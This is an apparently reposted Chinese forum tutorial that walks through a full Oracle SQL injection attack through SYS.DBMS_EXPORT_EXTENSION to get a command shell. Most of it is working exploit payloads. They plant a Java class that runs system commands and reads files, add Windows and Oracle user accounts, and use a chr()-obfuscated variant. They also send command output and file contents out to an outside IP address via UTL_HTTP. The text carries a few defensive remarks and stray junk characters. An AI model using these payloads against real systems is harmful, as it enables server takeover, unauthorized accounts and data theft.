
标题: 实例演示oracle注入获取cmdshell的全过程

作者: admin    时间: 2012-12-18 12:21
标题: 实例演示oracle注入获取cmdshell的全过程
以下的演示都是在 web 上的 SQL*Plus 中执行的；在 web 注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
7 a& I. k( u: X0 R( d
/ p) U8 n% @# _5 S  ^) N% e, D  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。（用 'a'|| 是为了让语句返回 true 值。）
语句有点长,可能要用post提交。
以下是各个步骤：
1. 创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数（该包的 PL/SQL 注入缺陷早已被 Oracle 安全补丁修复，下面的步骤只对未打补丁的旧实例有效），在 Oracle 上创建 Java 类 LinxUtil，里面有两个函数：runCMD 用于执行系统命令，readFile 用于读取文件：
/xxx.jsp?id=1 and '1'<>'a'||( , f: z5 w% a0 B3 |/ I: v# I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''') Z( ]; H) Z/ K5 h3 g
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
4 j2 Y+ v8 b, R, P* W' Ynew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
6 t% y# p  k! }  B0 M. d) i& @}'''';END;'';END;--','SYS',0,'1',0) from dual % G2 ~- G5 E4 j; ?4 w* A
) 5 U5 E) N# s1 q) h. [
------------------------
如果 URL 有长度限制，可以把 readFile() 函数块去掉，即：
/xxx.jsp?id=1 and '1'<>'a'||(
+ r" |5 f. n% H. M1 Tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 G, m, {! u& `( W6 Y' }4 w' L" P
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(9 x% |2 y) c, Z9 p+ Y( g
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. }: ]9 Y# q3 T% B3 o}'''';END;'';END;--','SYS',0,'1',0) from dual
! u2 `% T5 [- q)
同时把后面步骤中提到的对 readFile() 的处理语句去掉。
------------------------------
2. 赋 Java 权限
5 m/ d# l5 h$ R, Wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. 创建函数
, a' d; l% |9 l2 P) L9 _: pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 a5 Y) J. u; z6 d; P. ^
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
! c; `( q) b3 ^9 j; e; K- Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: m5 D8 D5 o) U% ]create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. 赋 public 执行函数的权限
5 P8 ~) G4 p1 }. }! O6 V2 f' V9 Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual& [/ y6 ]' w( }: }  n
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. 测试上面的几步是否成功
and '1'<>'11'||( " Q  v2 R# j6 q9 ~5 E3 C3 K& {( R
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
/ Y% |* \9 o7 J* l8 l+ [2 p) / F5 U9 w* p, S
and '1'<>( - w( _) f. F: g
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
) ^: ~5 U4 k  Q3 f" x* f3 q3 p8 I)
6. 执行命令：
. l  @6 E  M9 B/ T) @# A/xxx.jsp?id=1 and '1'<>(
# J  ^& k; M5 Q0 X8 z6 u# y0 Y) zselect  sys.LinxRunCMD('cmd /c net user linx /add') from dual
& w$ U+ W. T% I! f  j
, ?6 E' h! B5 X- c$ s. w)
/ M* J* K0 B8 ]7 K6 W4 J9 q- C/xxx.jsp?id=1 and '1'<>( # j; s) J# W5 J  J6 N  v4 a0 r
select  sys.LinxReadFile('c:/boot.ini') from dual
, }- h1 F" f4 D7 X: K$ A( ?6 ?: p% s% ^' ^
), c7 a+ I+ [! z+ Z" n/ a! \* E2 k
  ! K1 u9 Q9 {; ?3 a: O: `) l/ r
注意：sys.LinxReadFile() 返回的是 varchar 类型，不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果，可以用 union：
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual9 q4 O3 P7 X2 b' b9 {! A" m
或者用 UTL_HTTP.request()：
+ Y* L. H! [; F1 A0 b( {/xxx.jsp?id=1 and '1'<>(
! ~- ], l  A: f0 XSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual2 ^  r, y+ k3 Y: u3 u) \8 A# X% h
)
# d$ Z- \  D% Y/ V4 g/xxx.jsp?id=1 and '1'<>( , b1 v  g% o, W: L" v
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual7 i# w9 Q  c6 ]6 r
) * Y  Y/ ?+ x7 n* F  j
注意：用 UTL_HTTP.request 时，要用 REPLACE() 把空格、换行符替换掉，否则无法提交 HTTP 请求。用 utl_encode.base64_encode 也可以。（从防御角度看，这类由数据库主机发起的出站 HTTP 请求在出口流量日志中非常显眼；限制数据库服务器的出站访问并审计 UTL_HTTP 的调用，即可发现和阻断这种外带通道。）
--------------------
6. 内部变化
通过以下查询可以查看 all_objects 中的改变（这些新增对象也正是 DBA 排查此类入侵时应检查的痕迹）：
9 X* F9 T) h: o3 }* I& Pselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7. 删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* R# N6 j/ r+ Q
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 5 t& n/ D6 H! l0 z/ c  z" p, S( i
====================================================
全文结束。谨以此文赠与我的朋友。
linx   U6 Z# s! q; V# ]6 I
124829445   ?% F2 o4 ?, E/ W
2008.1.12
$ k" L! a/ U' L7 C( r( E+ Klinyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法：
创建 Oracle 帐号：
; {) v. ^2 ?( vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 e* m4 K% I* a. S' D! a" SCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
即：
, l# ]5 N5 b% E; O! Yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
4 c. d, [5 a6 Ichr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual 7 p9 N0 s9 ]+ n4 V4 I2 v
确定漏洞存在：
1<>(
& R! x# W3 J0 ^9 m2 e# ?select user_id from all_users where username='LINXSQL' 2 }9 {: Y( T' m
)
给 linxsql 连接权限：
8 i, b% T9 m2 ?2 i+ G% ]) }/ Pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# m2 M+ B3 g% i. q# i% r6 ]% o; hGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号：
& c4 L1 _0 W. P) e4 d2 {3 ^5 \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; j+ U! q+ L+ ~' e5 Sdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多条语句的函数 Linx_query()，执行成功的话返回数值 "1"；但它的权限是继承调用者的（authid current_user），可能仅仅是 public 权限，作用似乎不大，真要用的话可以考虑 grant dba to 当前的 User：
  L5 a5 u7 V  o( d5 f; j1.jsp?id=1 and '1'<>(
2 T3 l2 T+ A8 I  A& E3 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 V( |0 A8 Q  {. p
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
+ ]" Y) s* L- P0 B, r/ Q4 H) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
" }4 ~1 S, _$ u, M )9 `- H; C2 ^/ L$ S

1 `" ]+ I" W5 i8 r
/ u3 q; @! x' o: f( }  i, V  q* S( j' {




